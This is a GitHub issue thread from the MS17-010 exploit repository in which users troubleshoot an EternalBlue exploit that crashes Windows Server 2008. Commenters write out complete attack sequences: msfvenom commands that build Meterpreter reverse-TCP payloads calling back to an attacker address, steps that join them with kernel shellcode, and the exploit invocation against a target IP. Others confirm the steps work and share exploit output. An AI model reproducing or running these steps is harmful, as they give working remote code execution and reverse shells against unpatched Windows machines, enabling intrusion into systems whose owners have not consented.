worawit / MS17-010


EternalBlue7 Crashing Server 2008 #3

Closed benichmt1 closed 7 years ago

benichmt1 commented 7 years ago

Reproduction steps:

  1. Generate x64 and x32 shellcode from msfvenom

$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444

...

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445 ...

  2. Run eternalblue_merge_shellcode.py: ./eternalblue_merge_shellcode.py sc_x86_msf.bin sc_x64_msf.bin sc_out.bin

  3. Run python eternalblue_exploit7.py IP /opt/MS17-010/shellcode/sc_all.bin

  4. Begins connection then fails. Machine crashes.

    shellcode size: 874
    numGroomConn: 13
    Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
    SMB1 session setup allocate nonpaged pool success
    SMB1 session setup allocate nonpaged pool success
    Traceback (most recent call last):
      File "eternalblue_exploit7.py", line 582, in
        exploit(TARGET, sc, numGroomConn)
      File "eternalblue_exploit7.py", line 544, in exploit
        recvPkt = conn.recvSMB()
      File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
        r = self._sess.recv_packet(self.__timeout)
      File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
        data = self.read(timeout)
      File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in read
        data = self.read_function(4, timeout)
      File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
        raise NetBIOSTimeout
    impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.

ghost commented 7 years ago

I can confirm this is an issue. https://i.pitterapp.com/aJS0WbOpi.PNG

vivami commented 7 years ago

I have successfully exploited Windows Server 2008 R1 x64 doing the following:

  1. nasm -f bin eternalblue_kshellcode_x64.asm
  2. msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<LOCAL_IP> LPORT=4444
  3. cat eternalblue_kshellcode_x64 meterpreter_msf.bin > sc_x64.bin
  4. python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin

I did not use the eternalblue_merge_shellcode.py, which I wouldn't recommend using if you know the architecture of the target.

RickTorresJr commented 7 years ago

I can confirm @vivami 's steps work:

[screenshot: eternalblue_2008r2_success]

However, it is incredibly unreliable and results in the following crash 80% of the time:

[screenshot: eternalblue_2008r2_instant_crash]

The other type of crash experienced happens occasionally when exiting the Meterpreter session:

[screenshot: screen shot 2017-07-08 at 2 58 35 pm]

kalifan commented 7 years ago

@RickTorresJr Yes, it is true. I have the same issue as you.

worawit commented 7 years ago

The error about Windows restarting in one minute is caused by lsass.exe crashing. It crashes because of bad userland shellcode.

So this issue is that you guys did not use the exploit correctly.

imanihb2007 commented 5 years ago

Hi, how can I resolve this problem?